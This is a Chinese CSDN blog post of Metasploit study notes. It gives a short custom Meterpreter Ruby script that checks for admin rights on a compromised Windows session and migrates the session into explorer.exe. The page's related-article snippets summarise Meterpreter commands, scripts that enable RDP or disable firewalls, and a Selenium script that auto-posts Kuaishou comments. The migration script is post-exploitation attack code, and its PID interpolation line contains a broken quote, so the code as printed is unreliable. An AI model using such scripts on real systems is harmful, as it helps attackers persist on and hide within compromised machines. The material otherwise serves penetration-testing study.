自定义meterpreter脚本(代码记录)

最新推荐文章于 2023-09-16 15:15:54 发布
最新推荐文章于 2023-09-16 15:15:54 发布
阅读量336 收藏
点赞数 1
分类专栏: 精通Metasploit学习笔记 文章标签: metasploit 渗透测试 kali linux 脚本语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_19623861/article/details/116563185
版权

整体代码,这个脚本会检查我们现在是否为管理员,然后找到explorer进程,并自动迁移到这个进程

admin_check = is_admin?
if(admin_check)
    print_good("Current user is admin")
else
    print_error("Current uesr is not admin")
end
session.sys.process.get_processes().each do |x|
    if x['name'].downcase=='explorer.exe'
        print_good("explorer.exe process is running with PID #{x['pid]'}")
        explorer_ppid = x['pid'].to_i
        print_good("migrating to explorer.exe at PID #{explorer_ppid.to_s}")
        session.core.migrate(explorer_ppid)
    end
end

使用方法:进入meterpreter后运行run mymet #脚本名称

我重来不说话
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
meterpy:Meterpreter目标Python脚本
04-28
米皮 Meterpreter目标Python脚本
MeterSphere使用之自定义代码
Caoqingqing521的博客
07-26 352
代码】MeterSphere使用之自定义代码段。
metersphere如果使用python编写自定义脚本进行断言
m0_72802317的博客
07-17 5520
metersphere功能使用技巧分享
metasploit之编写meterpreter
Yale的博客
01-31 644
我们来写自己的meterpreter脚本,同样从Helloworld开始 这样子我们就可以在拿到meterpreter之后运行查看结果了 确实输出了hello world,我们在此基础上再增加其他的API调用,比如error,line 有没有这很像我们学习C语言时的print,scanf标准输入输出之类的。 实际上,status,error,line在向运行脚本的用户提供信息时都有不同的用途...
盘点MeterSphere那些不得不提的实用功能(一)
PKLibrarian的博客
08-15 2086
本文主要介绍5个MeterSphere比较实用的功能,希望大家喜欢
module_meterpreter:FruityWifi Meterpreter 模块
07-05
此外,PHP还可以用来编写自定义脚本,自动化渗透测试流程,提高工作效率。 **学习和应用** 理解并掌握Meterpreter模块和FruityWifi的结合使用,对于网络安全专业人员来说至关重要。这不仅需要熟悉Metasploit框架和...
meterpreter_bins:适用于 Windows 和 POSIX 的 Meterpreter Meterpreter 二进制文件
06-05
1. **命令执行**:可以执行目标系统上的任意命令,包括系统命令和自定义脚本。 2. **文件操作**:上传、下载、删除文件,甚至创建隐藏文件和目录。 3. **注册表操作**:读写注册表项,执行注册表相关的任务。 4. **...
post-exploitation:有用的脚本和模块
05-26
2. **PowerShell_meterpreter**:这是Metasploit框架的一个模块,将Meterpreter会话包装成PowerShell脚本,使得攻击者可以在目标系统上执行Meterpreter命令,进行进一步的渗透测试或恶意活动。 3. **PowerSploit**...
metasploit
03-16
用户可以编写自定义脚本,实现批量扫描、漏洞验证和攻击执行。 9. **Post-exploitation阶段** 攻击成功获取shell后,Metasploit提供了post-exploitation模块,帮助攻击者进一步扩大控制范围,例如提升权限、横向...
Meterpreter命令合集(详细)
最新发布
2302_76986722的博客
09-16 2068
help# 查看Meterpreter帮助background#返回,把meterpreter后台挂起bgkill# 杀死一个 meterpreter 脚本bglist#提供所有正在运行的后台脚本的列表bgrun#作为一个后台线程运行脚本channel#显示活动频道sessions -i number # 与会话进行交互,number表示第n个session,使用session -i 连接到指定序号的meterpreter会话已继续利用sesssions -k number #与会话进行交互。
渗透之——Metasploit制作并运行自定义Meterpreper脚本
冰河的专栏
01-15 2233
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86494361 注意:运行此脚本的前提是我们已经经过一系列的渗透,成功拿下了Meterpreter命令行。 这个脚本将会检查我们当前用户是否为管理员用户,然后找到explorer.exe进程,并自动迁移到这个进程中。 具体脚本mymet.rb如下: ## # Author...
MeterSphere的前后置脚本代码模版说明
weixin_38612318的博客
03-02 4199
MeterSphere接口测试脚本调试
MeterSphere脚本大全总结
qq_40319357的博客
07-18 829
代码】MeterSphere脚本大全总结。
MeterSphere之项目设置
qq_41780297的博客
02-03 1487
MeterSphere模型我们可以这样理解 系统: 每个独立部署的 MeterSphere 即称为一套系统 系统级角色: 角色的权限范围为整个系统,常见的角色,如系统管理员,可管理整个系统内的租户、用户及测试资源, 同时可变更修改系统级配置参数 工作空间:MeterSphere 中的一级租户,可映射为公司的某一个部门、一个部门下的不同团队 工作空间级角色:角色的权限范围限定在某个工作空间当中, 常见的角色,如工作空间管理员及普通用户, 可在工作空间中创建项目、发起测试、查看测试报告等 项目:MeterSph
MeterSphere测试平台JavaScript代码片段引入第三方js文件
jiaweide123的博客
06-06 888
在MeterSphere测试平台上通过js对参数进行加解密操作
metasploit之利用常见meterpreter脚本
Yale的博客
01-31 1028
已存在的Meterpreter常见脚本 getcountermeasure脚本检查受害者系统上的安全配置,并可以禁用其他安全措施,如防火墙等。 “getgui”脚本用于在目标系统上启用RDP(远程桌面协议)(如果禁用的话) 加上-e遍开启了rdp ‘get_local_subnet’脚本用于获取受害者的本地子网掩码。这在我们内网漫游时可能是非常有用的信息 “gettelnet”脚本用于在受...
meterpreter常见脚本介绍
weixin_34228617的博客
03-08 325
君莫笑 · 2015/10/21 10:180x00 前言在获得meterpreter的session后,除了meterpreter本身内置的一些基本功能,在/usr/share/metasploit-framework/scripts/meterpreter下面还有很多scripts,提供了很多额外功能,非常好用我看网上没有详细介绍常见脚本功能的文章,就总结了一下我们可以通过run 脚本名来进行...
Shell编程——自定义函数示例
LS19990712的博客
09-29 224
便可使用的编写登录系统后便可使用的用户自定义函数 脚本: #!/bin/bash #自定义函数 service_index(){ echo "servicectl <servername> <start|stop|status|reload|restart>" return 1 } service_version(){ grep "CentOS.*rel...
Metersploit系统参数说明
weixin_30703911的博客
08-30 697
Back参数 Back参数主要⽤用于返回。⽐比如你进⼊入了了某⼀一个漏漏洞洞模块的设置,但是你想再重新选择一个漏漏洞洞模块,那么就需要⽤用到back参数。 这张图说明,才开始我使用了ms08_067_netapi的利用模块,之后使⽤了back参数返回。 Banner参数 这个主要是查看metasploit的版本信息,利利⽤用模块数量量、payload数量量等等。 ...
python快手自定义评论脚本代码
08-09
Python快手自定义评论脚本代码可以通过使用Selenium库来实现。 首先,我们需要安装Selenium库。可以通过运行以下命令安装Selenium: ``` pip install selenium ``` 接下来,我们需要下载并配置驱动程序,以便Selenium能够与浏览器进行通信。驱动程序的选择取决于你使用的浏览器。例如,如果你使用的是Chrome浏览器,你需要下载ChromeDriver,并将其添加到系统路径中。 下面是一个示例脚本,用于在快手视频中自动评论: ```python from selenium import webdriver from selenium.webdriver.common.keys import Keys from time import sleep # 设置浏览器驱动程序路径 driver_path = "path_to_chromedriver" # 创建浏览器对象 driver = webdriver.Chrome(driver_path) # 打开快手网页 driver.get("https://www.kuaishou.com") # 等待页面加载完成 sleep(3) # 根据需要登录快手账号 # ... # 进入指定的视频页面 video_url = "https://www.kuaishou.com/video/{video_id}" driver.get(video_url) # 等待视频页面加载完成 sleep(3) # 在评论框中输入自定义评论内容 comment_input = driver.find_element_by_xpath("//input[@id='comment-textarea']") comment_input.send_keys("自定义评论内容") # 发布评论 comment_input.send_keys(Keys.RETURN) # 关闭浏览器 driver.quit() ``` 在上述代码中,你需要将`path_to_chromedriver`替换为你自己ChromeDriver的实际路径,并将`{video_id}`替换为你想要评论的视频的ID。 该脚本会打开指定的快手视频页面,并自动在评论框中输入自定义评论内容,然后发布评论。 需要注意的是,使用自动化脚本可能违反快手的使用条款,因此在使用该脚本之前,请确保你已经阅读并理解了快手的条款和条件,并获得了适当的授权。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我重来不说话

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值